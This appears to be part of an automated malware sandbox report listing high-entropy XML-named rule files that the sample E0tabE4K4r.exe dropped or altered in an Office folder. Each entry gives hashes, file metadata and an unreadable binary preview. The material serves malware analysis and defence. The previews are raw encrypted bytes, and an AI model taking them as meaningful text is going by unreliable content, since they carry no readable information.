                                                                                                                                                  Preview:<?xmlcT#Au..-.G...S.G.........]."P..u.........]....i..2/..o.s..a.Qc..s..S.....%.p.....G&.s...c.\.....e..o<...%o...7KC...VV.....U.Z.....(.,.0..V[..Ar....gC..!}....)..I.t..Z...=...2...rW..WS..:..q.b.%..*^.t..............g....n.6N&b....}..3.[..&..Us..*T"........O&.fI..|..O...1@HL.....p.6gl...kI'.I..h.9..t..^sy..Z.....<..S...+H72.~8P..-n...Z.E.W0F^.>.E.B.\..&.......n.]R.._....S.+.......9<..!s.b...........T%Q.y.Q..FL...d...)eg.Vs2q.Br....ddt.*....5j......u.;?....7D.....q._HtA..-...z..3m.WN:6..Q.#.....P.Q."C..um.c...V.o.E'.v../>.z..D>....$n....i4.4`.d.le.Oia0.y.G.\. 0..%H..)^qkq.HE<s.}....5C..:...6P...!:..9.k.......uem..`.V.z..A........K..._........y....y.#.....B&....{..D..`..Oihq..;.....+...y3..T:A...>P..~.p.$.N*f...}.J......A>U......K....t?.&.@.I.G...S.2$.Gt........aS...v........=..y......X..=....Q,.X..o..{?.z....[..!.I.0]~.=.....#}.n..hh.[$.G,!........f....p..#F.N.+....!..3(....U=.N+Z*....G.o.G.2Egq*..&....0.L.OPy..<.s.....1.X..cU.....tP..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703351v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1736
                                                                                                                                                  Entropy (8bit):7.879123821135687
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:him+lV51jbzUb2rMupYY9+jpTiUQrogJdtiAr98j7Bp0tJ7Jimfh3RQIJYUP9KY4:075VUb2rMuTSZ2JdtX9Qshm8F9KRD
                                                                                                                                                  MD5:AB6D8A8FD2937A85EBE213A3C5E86FE9
                                                                                                                                                  SHA1:BF98044911835083A0A3DDF5FB0E4669765FABF0
                                                                                                                                                  SHA-256:2D83056B9CABB50945CF43F8F370021DD391DF0B70EB1C00F5E4567DFC7EF954
                                                                                                                                                  SHA-512:9E3D300FF201F9A25AE2D1487C9D8108093F765D93D3AA620887F280882766B2A629B198CB942CC15DCBEBFBA7A917442B38A0954E603CA389E4B154DB6E8C6B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......>.d..7..A...D...,h..;...?m:C...y..3....%aFEgW.(.sk..}..=..K.a.1.Y..[....:Vf4...jj..p.._.........[.;V0....o..a..=mA$l......;....j......?........gH...'~.T...5..iH..X..\P.<..-.......|.P6Q...mX....n.n..t.V......Y............1~.dI!b..&..Y....(K.c&....%WA..|....*w..H..4wx.Wo#1.:..*...C.=...r(..bt.....o.8..=.X.....|.u...T....-hN*.r....NJ..:.....e3..90..1......J..^<..^=..p...Lb......E1..g .q....t'..]...u.........S@.j.x..Ke...\-e....}.....i.E......._s.x..L.V.......G.j....V.wss.;..a..n.V..5x..x.n.......;+d=.536.0..X.9...<w...:b.........e.._.\..Bv.ucw..2.j.9K.....8Di=..u.....f..j.....l#.".....<.g;.Ab$..|[....D2.;d:{......D<..,o.....(4.}..^ce.IX.M..9t..|.<.......A.."....f..Z.$.......M...J.P.jj\M.CS...G.j....R...fN....\{q...p.......i.4.iU.........H.$.9[].........F.ng.ti...(.kRS.9)..U.B.c....k..F[.m..-S..F..../^1.._!.0tW%.aY..G.!F..C..)..^.........0r.x./D.C..c..l.~.<z..v...........n...]..in.W.....T.P.!..h....d......q.X=.Bz(G..zAD.X.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703400v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1721
                                                                                                                                                  Entropy (8bit):7.886059120942018
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:viu8bAHrVyLn6hGkhCTlp+oQgMN1ZlcGkD:aurHrV06hElpcXllcGw
                                                                                                                                                  MD5:5ABE92550D3718D5CF06A2B6ECE3E020
                                                                                                                                                  SHA1:F0644F17EC32CDE738E2861E8B74D070DBBD6703
                                                                                                                                                  SHA-256:4ACD210B561F784CCC648035B74E756A0132BA663F3A6C79AD19377AC6A71529
                                                                                                                                                  SHA-512:E6DC278FDC46092C832DECE820289A96AB8860428542F8444594CA31B1438114E828EB2AD4659C4622DD1AFC3D9B7C02259F2F6F64452D044BCFE39F37576B48
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....9.i.a.~.zab.P?..~.}.'5...q..e..<..^.......#....\\..<.w.%.$vg?..K."6....G....q+.{'....'.1.m.+..`.....t.<.6.!\..-.).....Zx..\...,...0.....O.\....v.|..^.0.....?4..c\..A.A......?..!...]O..U...zG......u.D.yxv(KgB.5......_D..t.....6..aG.u..S.m.....).....5.(..5.W..'....Vf[]...J..L.48...)]C.....................CU..c...K.XZ>8V..-.!r1.1<~.]._...!.............j..ZM..k.N.../$..O.x.).S...h..5)..~....xx...A.q.r..D8.`....rI.E......F...c...J.C=...!.,'H.cW......t..$.^w.....C7<..=l.l.......i0.....C?...GV...).SO8.H7:..bD...;c}..x.`k.............pja......"E64...^.A.....V.l..%.jq......0..N8.N....<..{z.\P..!.Fho...)...][i....%..\2w.(/.o.*...1.3.}.CrM....:.....S...8.....;._..#f6!.".Y.....qYz..x.o.,.1...|p....Bw.gp.g5.u5..J...3V....&.0.%'....M.l..f.......\!@..`f .....}.u..L.C}..[....0o.....I.B...4`'nb.s....&..[p....b..._).^..*t..7?.e].2..2h.. C.(.M.n....i.K.}....3!...C..D.E.y.<....1=.l....B.Pb.p.2...y...J....uW.<....I......S..w[ZL..X.&_.m .8.W..\..4.F

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703401v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1758
                                                                                                                                                  Entropy (8bit):7.888236782202966
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:9r5ZgxZ3YlkfNRXC/msyVyk9Cir4PJE+DBGwcRkeQ3g1D:9VZgx6lk/yFUr9Ck4hE+VGwQn
                                                                                                                                                  MD5:4CBCB3648CAE25488F78A3DB85B8F492
                                                                                                                                                  SHA1:1008C90DE38C27CBAC1BA6D7194DF92E4FB18AAD
                                                                                                                                                  SHA-256:DECE541F8E34B248CBDD8B72EF0ABBE36F06638C2AA72B6F32CA995C97BF448F
                                                                                                                                                  SHA-512:0C794C19041E06F19A28C33E085B9C67FE1426F42946589474964BF004669020804EF7FFC4E8B34295C003DF9D28E5BDE9B9F85E39F366492048A2EAE9AC3DCD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..sh.....A;..]}u.:eN..D...;.z..,..."..tC.....=.y. .....M.U......3{..\6.."d.p....dM.8..@n..BW...,..$,....E.........>.:...jv....r....Cf...*..3..k(.zQ:c.R..T..<................2k.`(....q...<ar.1G...Q9.e.rC....lR..H.8.e..}O.l.dm.Hc.Z.v.(.&.3R...\..%...=.....WyAbz..B...~0.I..P..P....>-.-.......l.....$.L..*`.=.0..N.'.TE..xt..AO./.:..+......S..!. XA...O....5~.+.5.D..F.y.....sl!...p...,..O.......'g.'+$E.t.'...g.R...e.$.M.Hr...Z..b...$.y.[f....i.I...cZ...=d........m....=...d'.eb...n........C.|&S!..t.......V....9.O...FDx.=it.......p).@c...rr.....=5&..^.[`.}xy..A.F.j....,.Q.l..f....7.b.&5.#f.|C@....XI.=.-.ec...'.i...7K.D.<..0......I...)1..".>...Z^0...6H.xoux..._.qu....E.23}].7[.J.'....q7+.\..T+K..k....,.w.Ns.F....e.5..k.x.@_.oo%.......r..[..l.....a.8.."%....0.u..-...k.w.j.'..]...../.b.x.)..6.k..~..x.(..[:.5[/.}..o......._/.&%c........a........\=5.I..v.n...g..@.,.h9...z....G}..=...._.5.......O.}.u.Lr[fG...,$..... E|pzM'.B...1:....+..d?.+@.e...B

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703450v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1705
                                                                                                                                                  Entropy (8bit):7.898329369703711
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:6fBDx8qezaRq07SEsZmqC6qTelkqPwqZbxYlND:6ZlsGQ07ImqC6V4
                                                                                                                                                  MD5:9349F6C18D8365A8F180A1FD40E53B89
                                                                                                                                                  SHA1:10E3664351060FF4C3E924DBDC30B84EACC31B3E
                                                                                                                                                  SHA-256:7792C9019BE6E611B1D9E792497BC12A242B9475D38FC35B502DFB8CD4369A9C
                                                                                                                                                  SHA-512:32B178A8F14A19D9E893B361FF852187683364CFC705D3043604FDC44B215C78BE1BE35765867582C44C39E37835A7314EAB98B58F19008262A7FECE48B34612
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....F.z...6E_...F.Vl.e..}.$#....&...7......|..^T..4...C...l.;.b..w...j..w.......=...8k.`2.V3.Zx.c.;...Z+..0........../W./]U...G.l../...<G.7......kRO...;%.3}..?7.],.C.U....Fp..<...O.......#.....s..jmh.~j...Q.}.`M...e..5..R.C..`...t_v.w.lkq..X..C.F&..(R....T...K.a..-..[%...w.K^..l.q.{`.Yd.9.)...@.z.....$n. ._.?...P.!UJ....-..)......oq&.+..=.J,z.o.......@~.D...c.C|......r".......lV%....O.;......\mlI.......F.v.>....T.......<u.@e..F.T..Z.mWk}j..o........i..X.......-Y...n...1. ...z...[......Y...c..\~..E.M.I.+...A....[..$3....@..'Yg.K.H.Wj.~.....{...;.Y3....svg..|.\........@..Q.1.....4.O.<hT.C.5.).B?`...!.....`.F\...];!..z......&.pG.SH`^b...|t|.;6...M.G...a..q...k(......l./.P..D7\y...n 9..Q..;..r.s......Ux+.......;.<?....la...y.R..<...@.......H.1.lG==c.@.E....k..=sz..?..".y...4%vV&T..K.6<SGU.%*....+.t.B....d...i.0.AdW..|.S...q.%..Z..P..U..g9j]...EA;...9.....+j...Ljx.u....z.(....U;.WK.f.5.9T..........w...}.cV.......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703451v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1742
                                                                                                                                                  Entropy (8bit):7.875161640254416
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:PB5iEeNY7DoPiSQXuL1YmIY0Zut0kWBgubG/HqAMV3D:PzcqHoPiZg1z00NkgubcqAMVz
                                                                                                                                                  MD5:0305B1237246C368F273FE886BF4CC9F
                                                                                                                                                  SHA1:7EB31236AF4A0A951EB160BD757510626B532D6F
                                                                                                                                                  SHA-256:15723B698F5F7FDEA59D13760E57BB304D43496D57174A4BEDD9BCA08A793ED9
                                                                                                                                                  SHA-512:F3CA21A37D0E9840324E0613F0D27EC8644503B43C0C12853936DE246AE848FC0202FE3C00CE3338DC7D95BA3A57A3A309631F85AA2CB0EAEDFFD0835AB98E66
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...BT...T.L:...{.P.b......F..\...R)\..Xo.u...U.>gp...Q..;[..>.....~(........y.....)..z.A*._,..,..;.Y.c......O>.....O?KD..f.+.....!.....?B,..<.UH........v.....c..~.#I.{zq..M.....G..l#....hyc.R_.P.B-1..1lv....t.V.<.4........|..D.[O.....O,.y.b..b.7x..U...x7.0.+.*V.V?...@y.........P5....0e.Mv.Q....g.B...%.Ur....z...kt........3......{..*.2;K..\...c.'..o.....6.GN. . ...O. .F0....^......~.{..8I..We..u.2....9/8.X(..@m..Q.s.6..Zt.^c636L~B.3W....+.....qK.41j.J7....d..ecg...).s....H.b.....}...{.m8...D9....0;..#Z@=N:.).A....#....k.h5(...C)....]fo.t...X...;..D<.0nA....YY..xy=@...kj/..`.....];...a}......P...9.-.O.G...o.r./^.....3my7.B.p...........$C....~D..d.U.7..~.......PM-...y..wiR"pE.l.g....r$d....q....H....L.cI..[g.T..........]M.#..I.K...eL....\..y..p8........Xn..%...69{....v. .W4....M....^...6H..#.Ps.o.JJOiC&'.ue..eJ...lSq..+...&..g4..V.hc\[.D.=.=2..Q.soT.[m..E........>X.6.Cg.~.D.M...+.Fb..].......-..e.2..1.6..M]..w..SZD.@..V.{......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703500v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1695
                                                                                                                                                  Entropy (8bit):7.892589482349421
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:v/UY+YEZwOcSrmqVErSvEA7y37IWeyUeD:EYTObmceSvEj37oyUm
                                                                                                                                                  MD5:7E6A87C28B5BE1ED0AC466E4046BBB43
                                                                                                                                                  SHA1:E2FC86C97EEEA2DD4B70736F435FA41CE7D98F3B
                                                                                                                                                  SHA-256:7CD17ACC183D69E65B31934ACFCF28980F18B3264FD5885156E62F686344736C
                                                                                                                                                  SHA-512:2C74876A9BFE2710012709F57B055B74B3ED8A5B6B54F7E63962BFF4E60405487323F64315363E63FBF0F3BADFB99B528BAF3F2E5EF4609AC91FCEF8C1D2A9C7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......$. .,.#..`_..'.......W..*7G.w.%..G.?.t.)L......3.KA.r*v!..........a.4Uy7hK.e4....2.... ..\.}....w.6`+.Lc)...pG.v.y/..f.\..p...[{._..!..^.q.*.3+).....f..V....7}..Xr&n]....M.......toO..^)S..a.....J[Q...qr..I@....)i..IkN.}.0cb.Y:.9.G$s..so.B+qM@...*..Q@tI.....}...U..{..PVJ.....bJ......}.....}R|.0..n....0.}#..E....b..&".h.Q,....Ik.w`..EN.:.Zc......J.(n.-.w@...=C......<.W.7.)...#!B.....r#.y[."..C.....M.... .)k0.....)~a.#...M4?=AN.D,...l.}..P..v0.)>c..U...>b.../.I..=*."..N\.... +_..b.8*OHd.O.....p.q..w.@..1...........C..778.........}....^.D.,..b.>...'=.\#H......".6.w.](.I.....m.3.w.$.|...;.+.c...X..Rvx..-).........}..r.L..C.LV.=.j..iS?.(...K.S)S:J.(X..nv..{...8....U....V..o.q..r.D4..w.!..1.h8.....HF......^9.....b.n.B)3.&z.....A..!...)...&.F.;.tA..f>.Y..=.%.1. ..g...?..Ot.a.h..+.,{gD.=.K...7.)....<.p:*.d...v.5.+...l..?`1..i...w;........]A@....SA...\.As.....7..........-.\T+lf.j...r..%$..z.~..4..\r....s'..lU....n2.ZH....J_.~.j...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703501v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1732
                                                                                                                                                  Entropy (8bit):7.892356505452532
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:bBIK/TaKy4rVPyQD6nA7q/cVNcacbJ9WBr3VlD:qK/T3fPyZP/c0F9W53n
                                                                                                                                                  MD5:B9FEB5B7D25A7DAB4CFE648E1DB84932
                                                                                                                                                  SHA1:302AC3E40701966177FB304F920BCF9AF9117E43
                                                                                                                                                  SHA-256:A8660AA99B767CD5A21AA2F85B3AA6CE528AD90D6E2BC45395CC903FAEDB042B
                                                                                                                                                  SHA-512:5DD7ADF302192710680CD9FA8A776AA308B4DED696BE9B933DE6765E5CED99E9B427F61665AB2AB3322CA724E7547E82C4FEA216BE95D9B866A4948B8FDCBFC0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.cahA.".....Y~.i.MS'.n...X.q......;PN..w*<>>.e..F..h./.#4...W..0.;.T.@.]F..1...C..Z.v.....P.H.e3.c.......\.0.l.|.^.l4J..l.1....X#...e...h....F......Sa$:.5...7.. ..OD.(..1^.!.i..+.&..A.s.....6..v.].:....Ja...5S....BqZ..r.{....B8..T..Tg.;0....1`e....}...j'..!.p...^}dwq)..F.].F..t....kO.=`....C...A.~...30JK...^.M;.r.W....T...e8.e......B..ov.0j.l*...uW.......!.r.2...2pE..9..x..IN.9.K.>%....9.M..9.^...>.dO,.....Y.....E.Y?S..8fJ....X...;.(.......VS.>Muo....8....q..U.r.L..VUZ....2.s.9O.........Y....yF..J\.....|..<..........."M}`..w..>..G..j.h.>\._..@*....#..o.|t.j+..^ui.a.7)..e9...I./HI...N.3..1......].@...u.R..C.././.-.).$R.9.....ey...vk.[L..O.^.A...&0.|..9....coJ.8..x...v.\...w.B.,"N..r.......C.;..2..q._.....W.l...#y..9.MXl....h@....,).t{.&.if.kK@.5\$..|...F..{..WL......hY...l..O.%._.......0..n.x...BS..!K}..4.....\w{5 ........".0?....e&;.Bu...j...>v..c.d....7B.=&eO....*....F.> ..#.........EaZ...6.},.~V}..+M...OD.n(.....y%8CI.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703550v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1705
                                                                                                                                                  Entropy (8bit):7.889497768590504
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:HX4cbP5GEWnyxOamoayd5A3XT2HqzWvYJDbkeKnSnD:B5GEyKOaBnsT2HqX4nC
                                                                                                                                                  MD5:E15D5886B24BE206E72A76E5B0EC42EE
                                                                                                                                                  SHA1:93FA4D5154B1B6B0EBAB17041F710B7D29481D15
                                                                                                                                                  SHA-256:F26E0F0C22C4C7CB0D7297F7352F1389CF0F1B94791C568A90CD330E36F90EC7
                                                                                                                                                  SHA-512:B6B543BB915C2791D21A56F7A95D865D70C7F702DFD5DE4582AC5E98B8049731F396AB37E3225E00E5D0CB6CAC4F706489DCE0C44724E29E0A746648D8559DEF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...n|.8.B.RSu.<(..V..-:.....vK.....2.......>.A.(....m.>..^....tiy....k.JH.D...x..m..n....Jz.[.WDl.............G]jr..O..q.[O.k.q..:..UD.-....".r..]...3h.\.C.h#1.8.k...h$.Kj..k.=..Y.b..e.I..<..B.....?.(r.;...\)...>1f....y.a.N.#"..p.Z....qY.$.K~:.|L.L...x.b.vN.......W&..*...b`._.X......o.{G........l...}A...\.b.p.y.!oF.U....TPw.z..jI..`Q.tmv.j.U...FG...4."....:+.HT6../s..YG..1F..}.uztN..kS.4])V4..Ju.`-.6J.....A...l5.3. ..z_I.:..2u..Y...k.6.......&".eb..u....J..M.Qp^.....@Xq.J../p..8..b..,......U.H...M..\..Vpa.$.r.b_....{.....+.m.a.P....... ]..f.X...j<@....F....n.70sx....X...u...T.._.k/......w8......0...0`.l.r.....f.H...Pb.C..&........5e....]P.2*.bK......0..O.NE..r:..|...........w....w.........'#......j.>....;...9W2...h@.1H.kL#839.w...Z&%d6~.i..{.......9. ...h].>.Z..J.C.[..@..%..j...w..J....../.....^...........J..Qk...{....&....E.:..!u........Z:..v|..'&......rD.kvY..N.B..$g^'$.`...(..)[6"..9. .t8nA..m.0K.H.Z....=...6...;....E[.c

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703551v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1742
                                                                                                                                                  Entropy (8bit):7.879362392564282
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:jUqi2D/5GfIWdPv0q0QlHUBgKeFH6CUjFWD:jUqRhPov0iHUCKeLUBO
                                                                                                                                                  MD5:B2DB3DAA23F66368BBF24DB814668149
                                                                                                                                                  SHA1:451AC4E1B96D99AED4BABDC79BA1AC4CEDE91F0F
                                                                                                                                                  SHA-256:B8CE2F6E8B0EE6306C353617902AF1A1E4240648FD14A46C7C95E1BD7D0DCFD5
                                                                                                                                                  SHA-512:21F1F0CB177486EB66702D68C9E44F2B4DE74424B261B90B949BF3FCA74D305F05DA1CDDD1B5EFA253ADF419DAA5B23D74FB8336013793B966471387D933960B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..E...>N.....x..{.8.......h..pH........b6.6G.T....:.a/.`=.k.X.plj.:....>>..G..Dg...$ksprf...X).....r.h.....KO.:M.r..WNV..(.o.aLz..=...qgf]...m..3.|..........w.\...m:.Z......X.......E..lf...Bt......8..6D.:.j0.'.}.... ....d.....b..Nm.......L*..^2..k7YU&2.-..JR...A......2.V`...9c>......T..m..[.m...9.A.|.....v..}..;.j:25.GY.p...F1Gl..6....../1.]..f...,...?NEl.V.IF...G......+....}...s'...c.|..f.4......|QO....]U..t50A>'2z..D!W.....Q..\U#...8|./.3K...<.9..S.8.7.j=....Eoy.,..*.....nYhb.......`...A.....X.f[1.........5.A(...D$x.....p7P.6.Y....d..1T...ef.c'...VM...p.L..cH{RS.c1'b....C.O....W]..}.<1.D..r.<.......m.0._......g.>y.....Fb&....c.uA'~.....).]......}Y......F..........n..#A...:8*a.63o.K.=.<.$.....2.2l$.\ye..............)r.8?.d.....kE...2.".G1S.Uk.W.}..h...>/.XI[...cZ.d.z.<...E&...Hp.......E...)O=a...l+...@..j.....V.#R...J\....V......6..(..."5....c..<7.vz..u.s.%|W...oF.....+.<.*%..S. .F"]..>.Wq....C).90...#..].z...n.p.H

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703600v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1691
                                                                                                                                                  Entropy (8bit):7.875570109358201
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:mnMjMYkCtlSg4AxjED3Yp3xZnd151NfdD:6MjMY9j4Yja3YLtdjffl
                                                                                                                                                  MD5:53D4E3D229A5190CE8545AC42654CD4F
                                                                                                                                                  SHA1:0D37C3663FE55F0BBD644F8433539E7B18DBC6C5
                                                                                                                                                  SHA-256:17B6C2373264F39285D7AA8401B415CF258A6C23A4FBB21DB8A7F84F68B8FA04
                                                                                                                                                  SHA-512:410B7FEDB5106067325B74C0BD5B90F2B1587833306E7A729F890752875FE8A0891C5331FD9428B618A1529F0FB7D49399E7EF023B42E8C80F560CF808150B36
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..*..+. ..A..2P..$...~.R9.\~..r.5..k=......7=...F.*..Rg..$.S.a.....m......F].Y.6H..*.=Y?..}....Z.....q.ik&..a.,$Bz./.{..........L}t'.........@f.....TF....`c.....[...i.....*V7...hg;l.._....c.........$Q..t.n.9..I. uW...n$.).....*Vi.Q)...u..7H.zo.<R..s.S.k.W.....Q...M...<..R...b`.Y.,m..M...=..;.no..?........=.W.fJa1.EAK.....2..."l...2....YB..~1.J\..mz.r".r......aCm...kX..R.....j.S..RZ....r.e.^.%.s.j;..1...."K;.....A..q..H.=2....a.Z......m.@....5N.$T...Bo.....-~jw.&....X..O...Z..ltJ....2..9.V..s......'....F....D.~63[..b.n/...Bo.v.8..*.=...#....Rf!L..k...d.Z.Z.f....>..s.+.m.p9.p.~..W8.1.r.k]..=..=....Fe.u.3..&Wk....3G....#..U...@.)Uxj.;...yJf...H..'zW...t.rl....@.i.2"9.QA...M....$W...m..._....u(.k..{...)..*..Q@L........5@...W.*5;.h..<.......H/B....i...F)....:..XY.o.....o...s]S.BI*...@CGVK+..3.!![..e.| y..%L.:.z.w7...)h.{"'EV.....2+..n....Y6..c....m.....D$8...*{DUD..|..C.......".^..P...k....4J....zC.l.n.Ed.r.b...;V.MwT.a\.:..%wp.H...=.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703601v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1728
                                                                                                                                                  Entropy (8bit):7.879579008641971
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:fuSnCvQgm27BLU5largvMfm/YMSogB8w3O4hpscxKn3oD:f/CvQgZNLCJ2Qao6zO4wcxKn30
                                                                                                                                                  MD5:2392AE5A57A51A682852A8984508DCD8
                                                                                                                                                  SHA1:06492D5ACCE0963649CF4F432BF81D9D0B7713DB
                                                                                                                                                  SHA-256:4D95B7EF1287AFE373B883F3D164EAE3129160F5DC574673AC912877920C7D80
                                                                                                                                                  SHA-512:927285DDFFDBD907E07FE7AA2BC5551F25F548727BACF9F074FC465E21B4EEF63CD82790D33A4BDC7D6B27E0A92014CEE63D8C410FAB15E37335471AB99A146D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.qm.....fc..`..hSLe......p.....L.,.4.*E.c.p7.f....9RH....x_.zS>0......a.........X..Vv@f..9....n.Kk..n./I..^.*..<.)....6:4..zM...$..I...\&......]g..w.w.........{\^1U4.{,s...Q..e.lY.F.......].3......,..Q\.z..z..>P.9CDt.Fj.....|..6..F.f..G.8X.~.!K.....E..\.!.{(..p9...fs!L..!..vm.........O........i.M....^'.V..`]...fy.O.>.......h..Ae.=.Z...-....B.<....I..,...{...l.A..vFJ.P......M..1..S.....>._..(.cq..A.=.f2Ei...2m....e..U..[.9......kF:...a.D}n&....d.i.e.^?@_h.....*.......er.4.\.x...^~5.b.....R........5.H..U..Y.av.I.QW.U....g.3.....U.S.Z.....Y.*-x.#......0..c....`iyOi..L..d.J[JE.....B?|.....B....4..^.Q...J..K=}..G.n.._kdd.........s=c....A.W.=....."...^.%t~.A.D6...*B/g].....|J.{.u..L.._...d.8.V`."iq..[.[_H5......u,,pv.AQ...C.:".... ..V5..e.,.!...."um.A.ts.....w.......,..=1.~.D.%....vh.9.M.>.a.Y..K..d....J.-C.{...Q.BR.T&?.Ld.~.V....CK'-...aI.*8....\......NC.+...f..5|3.V.{V.1...!B ..c;.Dc.....h`...|S.6iT...e".YIW.].Q.X.9y..*+..-....AA.=..s@8&...o

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703650v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1693
                                                                                                                                                  Entropy (8bit):7.880242385996467
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:HjSC9GXVFmbUClue9MqsXTa1+d7T9RtTqFD:uC9kVFmYClbsXvdHjNA
                                                                                                                                                  MD5:EB4D1A2202398A695E25A7B51EE4F5EE
                                                                                                                                                  SHA1:A2703F659657C88341BB387CD21EF308B94F10BA
                                                                                                                                                  SHA-256:9ABDC6249ED131D9383BE9E08828B5BD1F13652774CAEDAF4AC2A3170F513C7B
                                                                                                                                                  SHA-512:B2CA3EC8A4C6758670F461AA06730B58CA3FE077F0A30F4AC33EF060D255AF8A602A0C47E8075D73639A527B263EC75B67D7D31D685DCF86D0136AABC603CB63
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..m.7.,....p..%7c..m0..|W.MZQn....1..g..`L..F.E....#.i7s....W....37...Ni...A......".[...~....W=......v.Q...{.7Y..A.H~.mD;..C...7B...}..9%.?......*......3!nr?.......H.u.n......q.}jg....sh.9........./.I..4.,.zV.a....]..q.h<1..l.f....n.........V. ..6.PtX5XA..xX{....J.)XP.I..d.v.....}v.rD..aZrmGR..^.!.u.!.A@#R..........#..eh.r...o..d........MN.{[...y.......0.;,zI...z1........B.W..Hu..%.WB).v.mf....z8......7.*......0&..DoF,...JG,aR......M..w...8~...".H...&.B-...?y..6.X.z........%z.i..u....t...w;}..w1.xR&.k.. ....*z't;.|.@....g.HL.2...bMx.,....kl..y8eo..d.qF...=M.>..f...:x.7ta.N.F;.x;./M&.1.....RzM.73.d....P.+...{... z..D..O..(.W...1..o=.m...Iy....x..7\L6..b.IH....?C..xR......B<..lCDs..|.....@...40.L1..."......m.r.O\....2;...M...]J..Q.U..EA.l3... ..6f...$H#. ...D{...r..%.q.3..|,r6...h...Abd... ././SrZ~....nx......i.b.[.iV!.....0icol.C...9.N..8<-.u..}hL.x....er....f.G..27...i.~LO.:.n...C.........y..G}.V...+F....V.dM_u.y`,...<

